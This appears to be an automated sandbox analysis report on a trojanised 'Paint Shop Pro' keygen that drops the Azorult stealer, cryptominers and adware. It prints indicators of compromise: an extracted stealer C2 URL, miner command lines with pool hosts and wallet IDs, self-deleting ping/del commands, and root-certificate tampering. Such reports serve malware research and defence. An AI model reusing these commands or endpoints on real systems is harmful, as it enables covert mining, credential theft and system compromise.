Analysis
-
max time kernel
62s -
max time network
61s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
04-04-2021 18:22
Static task
static1
Behavioral task
behavioral1
Sample
Paint_Shop_Pro_6_02_Eval_all_keygen.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
Paint_Shop_Pro_6_02_Eval_all_keygen.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
Paint_Shop_Pro_6_02_Eval_all_keygen.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
Paint_Shop_Pro_6_02_Eval_all_keygen.exe
Resource
win10v20201028
General
-
Target
Paint_Shop_Pro_6_02_Eval_all_keygen.exe
-
Size
5.2MB
-
MD5
c9d0760f5504d9e8ce237543fc4e7562
-
SHA1
12dac9b23d9f95b9647767e15a265a73380ad50b
-
SHA256
2519f6e84956fd35aaf7aa0ac51c2ce4cd8fddc973933936560ddb1efff6a16f
-
SHA512
28e06d8763858601484ec3675b5d0895712b616d69b36d4c584f32dfb56dfe9a7c26ad05dfda27efc2e9512c11d7dedcafd4d69d98baffdda8eb5af9ba99398a
Malware Config
Extracted
azorult
http://kvaka.li/1210776429.php
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
XMRig Miner Payload 4 IoCs
resource yara_rule behavioral1/memory/4668-142-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral1/memory/4668-143-0x00000001402CA898-mapping.dmp xmrig behavioral1/memory/4668-151-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral1/memory/4668-214-0x0000000140000000-0x000000014070A000-memory.dmp xmrig -
Executes dropped EXE 10 IoCs
pid Process 1468 keygen-pr.exe 2636 keygen-step-1.exe 3924 keygen-step-3.exe 2260 keygen-step-4.exe 212 key.exe 3804 Setup.exe 1564 multitimer.exe 3980 setups.exe 2268 setups.tmp 1540 askinstall20.exe -
Loads dropped DLL 7 IoCs
pid Process 2268 setups.tmp 2268 setups.tmp 2268 setups.tmp 2268 setups.tmp 2268 setups.tmp 2268 setups.tmp 2268 setups.tmp -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 147 ipinfo.io 144 ipinfo.io -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 2 IoCs
pid Process 4124 taskkill.exe 5456 taskkill.exe -
Modifies registry class 13 IoCs
description ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 998267c856add601 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\EnableNegotiate = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\MigrationTime = 998267c856add601 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\MigrationTime = 998267c856add601 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration MicrosoftEdge.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e askinstall20.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 askinstall20.exe -
Runs ping.exe 1 TTPs 3 IoCs
pid Process 6084 PING.EXE 4848 PING.EXE 2576 PING.EXE -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 145 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 153 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2268 setups.tmp 2268 setups.tmp -
Suspicious use of AdjustPrivilegeToken 37 IoCs
description pid Process Token: SeDebugPrivilege 3804 Setup.exe Token: SeCreateTokenPrivilege 1540 askinstall20.exe Token: SeAssignPrimaryTokenPrivilege 1540 askinstall20.exe Token: SeLockMemoryPrivilege 1540 askinstall20.exe Token: SeIncreaseQuotaPrivilege 1540 askinstall20.exe Token: SeMachineAccountPrivilege 1540 askinstall20.exe Token: SeTcbPrivilege 1540 askinstall20.exe Token: SeSecurityPrivilege 1540 askinstall20.exe Token: SeTakeOwnershipPrivilege 1540 askinstall20.exe Token: SeLoadDriverPrivilege 1540 askinstall20.exe Token: SeSystemProfilePrivilege 1540 askinstall20.exe Token: SeSystemtimePrivilege 1540 askinstall20.exe Token: SeProfSingleProcessPrivilege 1540 askinstall20.exe Token: SeIncBasePriorityPrivilege 1540 askinstall20.exe Token: SeCreatePagefilePrivilege 1540 askinstall20.exe Token: SeCreatePermanentPrivilege 1540 askinstall20.exe Token: SeBackupPrivilege 1540 askinstall20.exe Token: SeRestorePrivilege 1540 askinstall20.exe Token: SeShutdownPrivilege 1540 askinstall20.exe Token: SeDebugPrivilege 1540 askinstall20.exe Token: SeAuditPrivilege 1540 askinstall20.exe Token: SeSystemEnvironmentPrivilege 1540 askinstall20.exe Token: SeChangeNotifyPrivilege 1540 askinstall20.exe Token: SeRemoteShutdownPrivilege 1540 askinstall20.exe Token: SeUndockPrivilege 1540 askinstall20.exe Token: SeSyncAgentPrivilege 1540 askinstall20.exe Token: SeEnableDelegationPrivilege 1540 askinstall20.exe Token: SeManageVolumePrivilege 1540 askinstall20.exe Token: SeImpersonatePrivilege 1540 askinstall20.exe Token: SeCreateGlobalPrivilege 1540 askinstall20.exe Token: 31 1540 askinstall20.exe Token: 32 1540 askinstall20.exe Token: 33 1540 askinstall20.exe Token: 34 1540 askinstall20.exe Token: 35 1540 askinstall20.exe Token: SeDebugPrivilege 1564 multitimer.exe Token: SeDebugPrivilege 4124 taskkill.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 3980 setups.exe 2268 setups.tmp 2792 MicrosoftEdge.exe -
Suspicious use of WriteProcessMemory 46 IoCs
description pid Process procid_target PID 3992 wrote to memory of 188 3992 Paint_Shop_Pro_6_02_Eval_all_keygen.exe 77 PID 3992 wrote to memory of 188 3992 Paint_Shop_Pro_6_02_Eval_all_keygen.exe 77 PID 3992 wrote to memory of 188 3992 Paint_Shop_Pro_6_02_Eval_all_keygen.exe 77 PID 188 wrote to memory of 1468 188 cmd.exe 80 PID 188 wrote to memory of 1468 188 cmd.exe 80 PID 188 wrote to memory of 1468 188 cmd.exe 80 PID 188 wrote to memory of 2636 188 cmd.exe 81 PID 188 wrote to memory of 2636 188 cmd.exe 81 PID 188 wrote to memory of 2636 188 cmd.exe 81 PID 188 wrote to memory of 3924 188 cmd.exe 82 PID 188 wrote to memory of 3924 188 cmd.exe 82 PID 188 wrote to memory of 3924 188 cmd.exe 82 PID 188 wrote to memory of 2260 188 cmd.exe 83 PID 188 wrote to memory of 2260 188 cmd.exe 83 PID 188 wrote to memory of 2260 188 cmd.exe 83 PID 1468 wrote to memory of 212 1468 keygen-pr.exe 85 PID 1468 wrote to memory of 212 1468 keygen-pr.exe 85 PID 1468 wrote to memory of 212 1468 keygen-pr.exe 85 PID 2260 wrote to memory of 3804 2260 keygen-step-4.exe 84 PID 2260 wrote to memory of 3804 2260 keygen-step-4.exe 84 PID 3924 wrote to memory of 1428 3924 keygen-step-3.exe 86 PID 3924 wrote to memory of 1428 3924 keygen-step-3.exe 86 PID 3924 wrote to memory of 1428 3924 keygen-step-3.exe 86 PID 212 wrote to memory of 2476 212 key.exe 88 PID 212 wrote to memory of 2476 212 key.exe 88 PID 212 wrote to memory of 2476 212 key.exe 88 PID 1428 wrote to memory of 2576 1428 cmd.exe 89 PID 1428 wrote to memory of 2576 1428 cmd.exe 89 PID 1428 wrote to memory of 2576 1428 cmd.exe 89 PID 3804 wrote to memory of 1564 3804 Setup.exe 90 PID 3804 wrote to memory of 1564 3804 Setup.exe 90 PID 3804 wrote to memory of 3980 3804 Setup.exe 91 PID 3804 wrote to memory of 3980 3804 Setup.exe 91 PID 3804 wrote to memory of 3980 3804 Setup.exe 91 PID 2260 wrote to memory of 1540 2260 keygen-step-4.exe 93 PID 2260 wrote to memory of 1540 2260 keygen-step-4.exe 93 PID 2260 wrote to memory of 1540 2260 keygen-step-4.exe 93 PID 3980 wrote to memory of 2268 3980 setups.exe 92 PID 3980 wrote to memory of 2268 3980 setups.exe 92 PID 3980 wrote to memory of 2268 3980 setups.exe 92 PID 1540 wrote to memory of 4020 1540 askinstall20.exe 96 PID 1540 wrote to memory of 4020 1540 askinstall20.exe 96 PID 1540 wrote to memory of 4020 1540 askinstall20.exe 96 PID 4020 wrote to memory of 4124 4020 cmd.exe 99 PID 4020 wrote to memory of 4124 4020 cmd.exe 99 PID 4020 wrote to memory of 4124 4020 cmd.exe 99
Processes
-
C:\Users\Admin\AppData\Local\Temp\Paint_Shop_Pro_6_02_Eval_all_keygen.exe"C:\Users\Admin\AppData\Local\Temp\Paint_Shop_Pro_6_02_Eval_all_keygen.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3992 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:188 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1468 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:212 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵PID:2476
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:2636
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3924 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:1428 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:2576
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2260 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3804 -
C:\Users\Admin\AppData\Local\Temp\ABOTYU4IP4\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\ABOTYU4IP4\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1564 -
C:\Users\Admin\AppData\Local\Temp\ABOTYU4IP4\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\ABOTYU4IP4\multitimer.exe" 1 3.1617560607.606a041f0b8cb 1016⤵PID:4648
-
C:\Users\Admin\AppData\Local\Temp\ABOTYU4IP4\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\ABOTYU4IP4\multitimer.exe" 2 3.1617560607.606a041f0b8cb7⤵PID:4820
-
C:\Users\Admin\AppData\Local\Temp\vblmtmx25sl\lqipj4as5uq.exe"C:\Users\Admin\AppData\Local\Temp\vblmtmx25sl\lqipj4as5uq.exe" /VERYSILENT8⤵PID:4768
-
C:\Users\Admin\AppData\Local\Temp\is-TPCB3.tmp\lqipj4as5uq.tmp"C:\Users\Admin\AppData\Local\Temp\is-TPCB3.tmp\lqipj4as5uq.tmp" /SL5="$10316,2592217,780800,C:\Users\Admin\AppData\Local\Temp\vblmtmx25sl\lqipj4as5uq.exe" /VERYSILENT9⤵PID:5232
-
C:\Users\Admin\AppData\Local\Temp\is-D6I36.tmp\winlthsth.exe"C:\Users\Admin\AppData\Local\Temp\is-D6I36.tmp\winlthsth.exe"10⤵PID:6032
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\eopzl51nxim\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\eopzl51nxim\Setup3310.exe" /Verysilent /subid=5778⤵PID:5012
-
C:\Users\Admin\AppData\Local\Temp\is-VH5CI.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-VH5CI.tmp\Setup3310.tmp" /SL5="$402DC,138429,56832,C:\Users\Admin\AppData\Local\Temp\eopzl51nxim\Setup3310.exe" /Verysilent /subid=5779⤵PID:4992
-
C:\Users\Admin\AppData\Local\Temp\is-VJDT1.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-VJDT1.tmp\Setup.exe" /Verysilent10⤵PID:6120
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"11⤵PID:5404
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"11⤵PID:5484
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"11⤵PID:4844
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"11⤵PID:6136
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3ovefnvdhtt\app.exe"C:\Users\Admin\AppData\Local\Temp\3ovefnvdhtt\app.exe" /8-238⤵PID:5264
-
-
C:\Users\Admin\AppData\Local\Temp\ai10oh3lh2y\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\ai10oh3lh2y\cpyrix.exe" /VERYSILENT8⤵PID:5400
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe9⤵PID:4648
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe9⤵PID:4644
-
-
-
C:\Users\Admin\AppData\Local\Temp\j5gsvewyxvj\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\j5gsvewyxvj\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵PID:5508
-
C:\Users\Admin\AppData\Local\Temp\is-VA2MD.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-VA2MD.tmp\IBInstaller_97039.tmp" /SL5="$20462,14575146,721408,C:\Users\Admin\AppData\Local\Temp\j5gsvewyxvj\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq9⤵PID:5556
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-H9O24.tmp\{app}\microsoft.cab -F:* %ProgramData%10⤵PID:5760
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-H9O24.tmp\{app}\microsoft.cab -F:* C:\ProgramData11⤵PID:6096
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\semb3vsabdh\vict.exe"C:\Users\Admin\AppData\Local\Temp\semb3vsabdh\vict.exe" /VERYSILENT /id=5358⤵PID:5124
-
-
C:\Users\Admin\AppData\Local\Temp\ztilclv35oh\ql5d15klivi.exe"C:\Users\Admin\AppData\Local\Temp\ztilclv35oh\ql5d15klivi.exe"8⤵PID:4248
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\ztilclv35oh\ql5d15klivi.exe"9⤵PID:5816
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 300010⤵
- Runs ping.exe
PID:6084
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\xgommfidwbx\s3feaoctg4t.exe"C:\Users\Admin\AppData\Local\Temp\xgommfidwbx\s3feaoctg4t.exe" /ustwo INSTALL8⤵PID:5020
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "s3feaoctg4t.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\xgommfidwbx\s3feaoctg4t.exe" & exit9⤵PID:5868
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "s3feaoctg4t.exe" /f10⤵
- Kills process with taskkill
PID:5456
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\34cenn3e3mp\vpn.exe"C:\Users\Admin\AppData\Local\Temp\34cenn3e3mp\vpn.exe" /silent /subid=4828⤵PID:5608
-
C:\Users\Admin\AppData\Local\Temp\is-2720N.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-2720N.tmp\vpn.tmp" /SL5="$104AC,15170975,270336,C:\Users\Admin\AppData\Local\Temp\34cenn3e3mp\vpn.exe" /silent /subid=4829⤵PID:5672
-
-
-
C:\Users\Admin\AppData\Local\Temp\tn2jtgx1t0f\4hb1j4a2xeh.exe"C:\Users\Admin\AppData\Local\Temp\tn2jtgx1t0f\4hb1j4a2xeh.exe" /quiet SILENT=1 AF=7568⤵PID:5732
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\tn2jtgx1t0f\4hb1j4a2xeh.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\tn2jtgx1t0f\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617308720 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"9⤵PID:4060
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\00V1MUC7WW\setups.exe"C:\Users\Admin\AppData\Local\Temp\00V1MUC7WW\setups.exe" ll5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3980 -
C:\Users\Admin\AppData\Local\Temp\is-BMTTA.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-BMTTA.tmp\setups.tmp" /SL5="$1020E,454998,229376,C:\Users\Admin\AppData\Local\Temp\00V1MUC7WW\setups.exe" ll6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2268
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1540 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
- Suspicious use of WriteProcessMemory
PID:4020 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4124
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full_Version.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full_Version.exe"4⤵PID:4680
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"5⤵PID:4812
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install6⤵PID:4976
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"4⤵PID:4876
-
C:\Users\Admin\AppData\Roaming\A6B5.tmp.exe"C:\Users\Admin\AppData\Roaming\A6B5.tmp.exe"5⤵PID:4800
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w29434 --cpu-max-threads-hint 50 -r 99996⤵PID:4668
-
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w2804@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 999996⤵PID:5016
-
-
-
C:\Users\Admin\AppData\Roaming\A81E.tmp.exe"C:\Users\Admin\AppData\Roaming\A81E.tmp.exe"5⤵PID:4900
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"5⤵PID:5408
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:4848
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"4⤵PID:5008
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2792
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:4172
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4432
-
